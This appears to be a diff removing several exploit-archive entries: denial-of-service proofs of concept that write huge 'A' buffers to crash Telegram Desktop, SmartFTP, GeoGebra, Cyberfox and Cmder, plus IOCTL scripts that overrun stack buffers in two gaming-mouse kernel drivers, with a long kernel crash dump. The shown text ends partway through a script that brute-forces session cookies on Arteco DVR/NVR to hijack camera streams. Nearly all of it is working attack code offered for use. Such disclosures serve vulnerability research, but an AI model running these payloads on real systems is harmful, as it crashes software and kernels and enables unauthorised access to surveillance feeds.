# 1.Run the python script, it will create a new file "output.txt"
# 2.Run Telegram Desktop and go to "Saved Messages"
# 3.Copy the content of the file "output.txt"
# 4.Paste the content of dos.txt into the "Write a message..."
# 5.Crashed ;)
#!/usr/bin/env python
buffer = "\x41" * 9000000
try:
f=open("output.txt","w")
print("[!] Creating %s bytes DOS payload...." %len(buffer))
f.write(buffer)
f.close()
print("[!] File Created !")
except:
print("File cannot be created")

38
exploits/windows/dos/50266.py
View file

@ -1,38 +0,0 @@
# Exploit Title: SmartFTP Client 10.0.2909.0 - 'Multiple' Denial of Service
# Date: 9/5/2021
# Exploit Author: Eric Salario
# Vendor Homepage: https://www.smartftp.com/en-us/
# Software Link: https://www.smartftp.com/en-us/download
# Version: 10.0.2909.0 (32 and 64 bit)
# Tested on: Microsoft Windows 10 32 bit and 64 bit
=========================================================================
buffer = "//"
buffer += "A" * 423
f = open ("path.txt", "w")
f.write(buffer)
f.close()
1. Run the python script
2. Open SmartFTP > New Connection > FTPS (explicit)
3. Enter a non existing ip the FTP server can't reach (e.g 255.255.255.255)
4. In Path, copy paste the content of the "path.txt" generated by the python script
5. Click "OK"
6. SmartFTP client crashes
=======================================================================
1. Open SmartFTP > New Connection > FTPS (explicit)
2. Enter a non existing ip the FTP server can't reach (e.g 255.255.255.255)
3. In Path, type slash ("/") and click "OK"
4. The app should return "Error 0x80072741"
5. In the path's search bar, replace slash ("/") with whatever and press enter
6. SmartFTP client crashes
=======================================================================
1. Open SmartFTP
2. In the "New Connection" bar, clear the history (dropdown to the right of the bar)
3. Once the history is empty, click the bar and type anything
3. SmartFTP client crashes

300
exploits/windows/dos/50311.py
View file

@ -1,300 +0,0 @@
# Exploit Title: Yenkee Hornet Gaming Mouse - 'GM312Fltr.sys' Denial-Of-Service (PoC)
# Date: 2021/04/07
# Exploit Author: Quadron Research Lab
# Version: all version
# Tested on: Windows 10 x64 HUN/ENG Professional
# Vendor: https://www.yenkee.eu/gaming-mouse-hornet-aim/yms-3029
# Reference: https://github.com/Quadron-Research-Lab/Kernel_Driver_bugs/tree/main/GM312Fltr
import ctypes, sys
from ctypes import *
import io
from itertools import product
from sys import argv
devicename = "GM312Fltr"
ioctl = 0x22245C
ioctl_list = '''
0x22245C
0x222440
0x222441
0x222400
0x222404
0x222408
0x222420
0x222424
0x222448
0x222450
0x22245c
0x222460
'''
kernel32 = windll.kernel32
hevDevice = kernel32.CreateFileA("\\\\.\\GM312Fltr", 0xC0000000, 0, None, 0x3, 0, None)
if not hevDevice or hevDevice == -1:
print ("Not Win! Sorry!")
else:
print ("OPENED!")
buf = 'A' * 2000
bufLength = 2000
kernel32.DeviceIoControl(hevDevice, ioctl, buf, bufLength, None, 0, byref(c_ulong()), None)
[Bugcheck Analysis]
Fatal System Error 0x000000f7
(0xBEBEA1CAEAF0A2C1,0x0000F80736BC1742,0xFFFF07F8C943E8BD,0x0000000000000000)
Break instruction exception - code 80000003 (first chance)
nt!DbgBreakPointWithStatus
fffff807`2e1feb90 cc int 3
0 kd !analyze
Connected to Windows 10 19041 x64 target at (Mon Jun 14 204816.370 2021 (UTC + 200)), ptr64 TRUE
Loading Kernel Symbols
...............................................................
................................................................
........................
Press ctrl-c (cdb, kd, ntsd) or ctrl-break (windbg) to abort symbol loads that take too long.
Run !sym noisy before .reload to track down problems loading symbols.
........................................
.............................
Loading User Symbols
.............................................
Loading unloaded module list
........
Bugcheck Analysis
DRIVER_OVERRAN_STACK_BUFFER (f7)
A driver has overrun a stack-based buffer. This overrun could potentially
allow a malicious user to gain control of this machine.
DESCRIPTION
A driver overran a stack-based buffer (or local variable) in a way that would
have overwritten the function's return address and jumped back to an arbitrary
address when the function returned. This is the classic buffer overrun
hacking attack and the system has been brought down to prevent a malicious user
from gaining complete control of it.
Do a kb to get a stack backtrace -- the last routine on the stack before the
buffer overrun handlers and bugcheck call is the one that overran its local
variable(s).
Arguments
Arg1 bebea1caeaf0a2c1, Actual security check cookie from the stack
Arg2 0000f80736bc1742, Expected security check cookie
Arg3 ffff07f8c943e8bd, Complement of the expected security check cookie
Arg4 0000000000000000, zero
Debugging Details
------------------
BUGCHECK_CODE f7
BUGCHECK_P1 bebea1caeaf0a2c1
BUGCHECK_P2 f80736bc1742
BUGCHECK_P3 ffff07f8c943e8bd
BUGCHECK_P4 0
PROCESS_NAME pythonw.exe
SYMBOL_NAME GM312Fltr+e1e
MODULE_NAME GM312Fltr
IMAGE_NAME GM312Fltr.sys
FAILURE_BUCKET_ID 0xF7_MISSING_GSFRAME_STACKPTR_ERROR_GM312Fltr!unknown_function
FAILURE_ID_HASH {b8e05604-2a11-789a-ad29-fc4916710f2d}
Followup MachineOwner
---------
0 kd kb
RetAddr Args to Child Call Site
fffff807`2e312d12 fffff807`344a4ae0 fffff807`2e17d000 00000000`00000000 00000000`00000000 nt!DbgBreakPointWithStatus
fffff807`2e3122f6 00000000`00000003 fffff807`344a4ae0 fffff807`2e20bbc0 00000000`000000f7 nt!KiBugCheckDebugBreak+0x12
fffff807`2e1f6df7 fffff807`344a5210 00000000`00000000 fffff807`36bc18c8 fffff807`344a51a8 nt!KeBugCheck2+0x946
fffff807`36bc0e1e 00000000`000000f7 bebea1ca`eaf0a2c1 0000f807`36bc1742 ffff07f8`c943e8bd nt!KeBugCheckEx+0x107
fffff807`36bc0ea7 fffff807`344a5210 00000000`00000000 fffff807`344a5748 fffff807`344a5720 GM312Fltr+0xe1e
fffff807`2e1ffbaf fffff807`36bc0e94 00000000`00000000 00000000`00000000 00000000`00000000 GM312Fltr+0xea7
fffff807`2e087547 fffff807`344a5710 00000000`00000000 ffffe08b`abb1e380 fffff807`36bc0b5d nt!RtlpExecuteHandlerForException+0xf
fffff807`2e086136 ffffe08b`abb1dcf8 fffff807`344a5e20 ffffe08b`abb1dcf8 ffffe30a`242183c0 nt!RtlDispatchException+0x297
fffff807`2e1f7b82 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 nt!KiDispatchException+0x186
fffff807`2e1f7b50 fffff807`2e208da5 00000000`ffffffff fffff807`2e0c3216 00000000`00000010 nt!KxExceptionDispatchOnExceptionStack+0x12
fffff807`2e208da5 00000000`ffffffff fffff807`2e0c3216 00000000`00000010 00000000`00000246 nt!KiExceptionDispatchOnExceptionStackContinue
fffff807`2e204ae0 ffffe30a`1ce27c00 ffffe30a`1ce21010 00000000`00000000 00000000`00000000 nt!KiExceptionDispatch+0x125
fffff807`2e1fe0c7 fffff807`2aab9180 000fa40d`b19b3dfe ffffe30a`27381080 fffff807`2eaea710 nt!KiGeneralProtectionFault+0x320
fffff807`2e1fda76 7fffe30a`29e4bb10 00000000`ffffffff 00000000`00000000 00000000`00000000 nt!SwapContext+0x377
fffff807`2e00c970 ffffe30a`00000006 00000000`ffffffff 00000000`00000000 ffffe30a`24218498 nt!KiSwapContext+0x76
fffff807`2e00be9f ffffe30a`27381080 fffff807`36b819b6 ffffe08b`abb1e270 00000000`00000000 nt!KiSwapThread+0x500
fffff807`2e00b743 ffffe30a`00000034 00000000`00000000 ffffe30a`23c6d800 ffffe30a`273811c0 nt!KiCommitThreadWait+0x14f
fffff807`36bc0ca2 ffffe08b`abb1e350 fffff807`00000000 00000000`00000000 00000000`00004100 nt!KeWaitForSingleObject+0x233
fffff807`36bc0b5d ffffffff`ff676980 00000000`00000000 00000000`00000bb8 fffff807`35142017 GM312Fltr+0xca2
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 GM312Fltr+0xb5d
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 00000000`0020027f 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 00000000`0020027f 00000000`5c4eafe0 0x41414141`41414141
41414141`41414141 41414141`41414141 00000000`0020027f 00000000`5c4eafe0 00000000`00000000 0x41414141`41414141
41414141`41414141 00000000`0020027f 00000000`5c4eafe0 00000000`00000000 0000ffff`00001f80 0x41414141`41414141
00000000`0020027f 00000000`5c4eafe0 00000000`00000000 0000ffff`00001f80 00000000`00000000 0x41414141`41414141
00000000`5c4eafe0 00000000`00000000 0000ffff`00001f80 00000000`00000000 00000000`00000000 0x20027f
00000000`00000000 0000ffff`00001f80 00000000`00000000 00000000`00000000 00000000`00000000 MSVCR90!pow+0x4e0

32
exploits/windows/dos/50322.py
View file

@ -1,32 +0,0 @@
# Exploit Title: Redragon Gaming Mouse - 'REDRAGON_MOUSE.sys' Denial-Of-Service (PoC)
# Date: 27/08/2021
# Exploit Author: Quadron Research Lab
# Version: all version
# Tested on: Windows 10 x64 HUN/ENG Professional
# Vendor: https://www.redragonzone.com/pages/download
# Reference: https://github.com/Quadron-Research-Lab/Kernel_Driver_bugs/tree/main/REDRAGON_MOUSE
import ctypes, sys
from ctypes import *
import io
from itertools import product
from sys import argv
devicename = "REDRAGON_MOUSE"
ioctl = 0x222414
kernel32 = windll.kernel32
hevDevice = kernel32.CreateFileA("\\\\.\\GLOBALROOT\\Device\REDRAGON_MOUSE", 0xC0000000, 0, None, 0x3, 0, None)
if not hevDevice or hevDevice == -1:
print ("Not Win! Sorry!")
else:
print ("OPENED!")
buf = '\x44' * 1000 + '\x00' * 1000
bufLength = 2000
kernel32.DeviceIoControl(hevDevice, ioctl, buf, bufLength, None, 0, byref(c_ulong()), None)

26
exploits/windows/local/49653.py
View file

@ -1,26 +0,0 @@
# Exploit Title: GeoGebra Graphing Calculator 6.0.631.0 - Denial Of Service (PoC)
# Date: 2021-03-15
# Exploit Author: Brian Rodriguez
# Vendor Homepage: https://www.geogebra.org
# Software Link: https://www.geogebra.org/download
# Version: 6.0.631.0-offlinegraphing
# Tested on: Windows 8.1 Pro
# STEPS
# Open the program Graficadora
# Run the python exploit script payload.py, it will create a new payload.txt file
# Copy the content of the file "payload.txt"
# Paste the content from payload.txt in the field "Entrada..."
# Crashed
--> payload.py <--
#!/usr/bin/env python
buffer = "\x41" * 8000
try:
f = open("payload.txt","w")
f.write(buffer)
f.close()
print ("File created")
except:
print ("File cannot be created")

26
exploits/windows/local/49654.py
View file

@ -1,26 +0,0 @@
# Exploit Title: GeoGebra Classic 5.0.631.0-d - Denial of Service (PoC)
# Date: 2021-03-15
# Exploit Author: Brian Rodriguez
# Vendor Homepage: https://www.geogebra.org
# Software Link: https://www.geogebra.org/download
# Version: 5.0.631.0-d
# Tested on: Windows 8.1 Pro
#STEPS
# Open the program GeoGebra
# Run the python exploit script payload.py, it will create a new payload.txt file
# Copy the content of the file "payload.txt"
# Paste the content in the field "Entrada:"
# Crashed
--> payload.py <--
#!/usr/bin/env python
buffer = "\x41" * 800000
try:
f = open("payload.txt","w")
f.write(buffer)
f.close()
print ("File created")
except:
print ("File cannot be created")

26
exploits/windows/local/49655.py
View file

@ -1,26 +0,0 @@
# Exploit Title: GeoGebra CAS Calculator 6.0.631.0 - Denial of Service (PoC)
# Date: 2021-03-15
# Exploit Author: Brian Rodriguez
# Vendor Homepage: https://www.geogebra.org
# Software Link: https://www.geogebra.org/download
# Version: 6.0.631.0-offlinecas
# Tested on: Windows 8.1 Pro
# STEPS
# Open the program Calculadora CAS
# Run the python exploit script payload.py, it will create a new payload.txt file
# Copy the content of the file "payload.txt"
# Paste the content from payload.txt in the field "Entrada..."
# Crashed
--> payload.py <--
#!/usr/bin/env python
buffer = "\x41" * 8000
try:
f = open("payload.txt","w")
f.write(buffer)
f.close()
print ("File created")
except:
print ("File cannot be created")

27
exploits/windows/local/50336.py
View file

@ -1,27 +0,0 @@
# Exploit Title: Cyberfox Web Browser 52.9.1 - Denial-of-Service (PoC)
# Date: 2021-09-26
# Exploit Author: Aryan Chehreghani
# Vendor Homepage: https://cyberfox.8pecxstudios.com
# Software Link: https://www.techspot.com/downloads/6568-cyberfox-web-browser.html
# Version: v52.9.1 (Possibly all versions)
# Tested on: windows
#[ About - Cyberfox ] :
#Cyberfox is a Mozilla-based Internet browser designed to take advantage of 64-bit architecture
#but a 32-bit version is also available.The application provides a higher memory performance when navigating your favorite pages.
# [ Exploit/POC ] :
# 1.Run the python script, it will create a new file "output.txt"
# 2.Run Cyberfox Web Browser
# 3.Copy the content of the file "output.txt" & Paste into the "search bar"
# 4.Crashed
Overflow = "\x41" * 9000000
try:
f=open("output.txt","w")
print("[!] Creating %s bytes DOS payload...." %len(Overflow))
f.write(Overflow)
f.close()
print("[!] File Created !")
except:
print("File cannot be created")

24
exploits/windows/local/50401.txt
View file

@ -1,24 +0,0 @@
# Exploit Title: Cmder Console Emulator 1.3.18 - 'Cmder.exe' Denial-of-Service (PoC)
# Date: 2021-10-07
# Exploit Author: Aryan Chehreghani
# Vendor Homepage: https://cmder.net
# Software Link: https://github.com/cmderdev/cmder/releases/download/v1.3.18/cmder.zip
# Version: v1.3.18
# Tested on: Windows 10
# [About - Cmder Console Emulator] :
#Cmder is a software package created over absence of usable console emulator on Windows.
#It is based on ConEmu with major config overhaul, comes with a Monokai color scheme, amazing clink (further enhanced by clink-completions) and a custom prompt layout.
# [Security Issue] :
#equires the execution of a .cmd file type and The created file enters the emulator ,That will trigger the buffer overflow condition.
#E.g λ cmder.cmd
# [POC] :
PAYLOAD=chr(235) + "\\CMDER"
PAYLOAD = PAYLOAD * 3000
with open("cmder.cmd", "w") as f:
f.write(PAYLOAD)

100
exploits/windows/webapps/49348.py
View file

@ -1,100 +0,0 @@
# Exploit Title: Arteco Web Client DVR/NVR - 'SessionId' Brute Force
# Date: 16.11.2020
# Exploit Author: LiquidWorm
# Vendor Homepage: https://www.arteco-global.com
#!/usr/bin/env python3
#
#
# Arteco Web Client DVR/NVR 'SessionId' Cookie Brute Force Session Hijacking Exploit
#
#
# Vendor: Arteco S.U.R.L.
# Product web page: https://www.arteco-global.com
# Affected version: n/a
#
# Summary: Arteco DVR/NVR is a mountable industrial surveillance server
# ideal for those who need to manage IP video surveillance designed for
# medium to large installations that require high performance and reliability.
# Arteco can handle IP video sources from all major international manufacturers
# and is compatible with ONVIF and RTSP devices.
#
# Desc: The Session ID 'SessionId' is of an insufficient length and can be
# exploited by brute force, which may allow a remote attacker to obtain a
# valid session, bypass authentication and disclose the live camera stream.
#
# Tested on: Microsoft Windows 10 Enterprise
# Apache/2.4.39 (Win64) OpenSSL/1.0.2s
# Apache/2.2.29 (Win32) mod_fastcgi/2.4.6 mod_ssl/2.2.29 OpenSSL/1.0.1m
# Arteco-Server
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
# @zeroscience
#
#
# Advisory ID: ZSL-2020-5613
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5613.php
#
#
# 16.11.2020
#
import sys,requests
class BrutusCookius:
def __init__(self):
self.validate=None
self.cookies=None#
self.params=None##
self.stream=None##
self.path=None####
self.cgi=None#####
self.ip=None######
self.op=None######
def check(self):
print('Usage: ./arteco.py IP')
exit(9)
def bro(self):
if len(sys.argv) !=2:
self.check()
else:
self.ip=sys.argv[1]
print('[+] Target IP: '+self.ip)
if not 'http' in self.ip:
self.ip='http://{}'.format(self.ip)
def force(self):
